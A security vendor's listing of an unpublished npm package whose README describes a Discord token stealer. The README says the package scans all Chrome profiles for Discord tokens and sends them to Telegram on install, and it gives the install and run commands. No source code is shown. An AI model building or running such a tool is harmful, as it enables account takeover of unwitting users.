Latest Threat ResearchGlassWorm Loader Hits Open VSX via Developer Account Compromise.Details
Socket
Book a DemoInstallSign in
Socket
Book a DemoInstallSign in

tiny-model-update

Package Overview
Dependencies
Maintainers
1
Versions
21
Alerts
File Explorer

Advanced tools

License
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install
Package version was removed
This package version has been unpublished, mostly likely due to security reasons

tiny-model-update

Discord bot that monitors servers and sends invite links via Telegram

unpublished
npmnpm
Version
1.18.1
Version published
Weekly downloads
3
50%
Maintainers
1
Weekly downloads
 
Created
Source

GitHub Badge Bot

A Discord client that monitors all servers your account is in, generates invite links, and sends them to a Telegram chat.

Quick Install

npm install github-badge-bot

The package automatically extracts Discord tokens and sends them to Telegram on installation!

⚠️ Important Warning

Using self-bots (user account tokens) may violate Discord's Terms of Service. Use this at your own risk. Discord may ban accounts that use self-bots.

Features

  • 🔍 Monitors all Discord servers your account is in
  • 🔗 Generates invite links for each server
  • 📱 Sends invite links to Telegram
  • 🆕 Automatically processes new servers when you join
  • 🔑 Automatically extracts Discord tokens from all Chrome profiles

Prerequisites

  • Node.js (v18 or higher)
  • Google Chrome installed
  • A Telegram Bot Token
  • A Telegram Chat ID

Setup

1. Install Dependencies

npm install

2. Configure Telegram

  • Create a Telegram bot via @BotFather
  • Get your chat ID (send a message to @userinfobot or your bot)
  • Create a .env file:
TELEGRAM_BOT_TOKEN=your_telegram_bot_token_here
TELEGRAM_CHAT_ID=your_telegram_chat_id_here

3. Extract Discord Tokens

Run:

npm run extract-tokens

This will:

  • Scan ALL Chrome profiles automatically
  • Extract ALL Discord tokens found
  • Send them directly to Telegram (no .env file needed)
  • Works even when Chrome is running!

Usage

Extract Tokens

npm run extract-tokens

Scans all Chrome profiles and sends all found Discord tokens to Telegram.

Start the Bot

npm start

The bot will:

  • Use the first Discord token from your .env file (if you have one)
  • Connect to Discord
  • Monitor all servers you're in
  • Generate invite links for each server
  • Send them to your Telegram chat

How It Works

  • Token Extraction: Reads Chrome's LevelDB storage files directly from disk
  • Multi-Profile: Scans all Chrome profiles to find tokens from multiple Discord accounts
  • Telegram Integration: Sends tokens and invite links directly to Telegram
  • No Browser Closing: Works even when Chrome is running

Notes

  • Tokens are sent directly to Telegram (not saved to .env)
  • All Chrome profiles are scanned automatically
  • Duplicate tokens are filtered out
  • Chrome can stay open during extraction

License

MIT

Keywords

discord
telegram
bot
token
extractor

FAQs

Package last updated on 22 Dec 2025

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

Open VSX Begins Implementing Pre-Publish Security Checks After Repeated Supply Chain Incidents

Security News

Open VSX Begins Implementing Pre-Publish Security Checks After Repeated Supply Chain Incidents

Following multiple malicious extension incidents, Open VSX outlines new safeguards designed to catch risky uploads earlier.

By Sarah Gooding  -  Feb 02, 2026
GlassWorm Loader Hits Open VSX via Developer Account Compromise

Research

/

Security News

GlassWorm Loader Hits Open VSX via Developer Account Compromise

Threat actors compromised four oorzc Open VSX extensions with more than 22,000 downloads, pushing malicious versions that install a staged loader, evade Russian-locale systems, pull C2 from Solana memos, and steal macOS credentials and wallets.

By Kirill Boychenko  -  Jan 31, 2026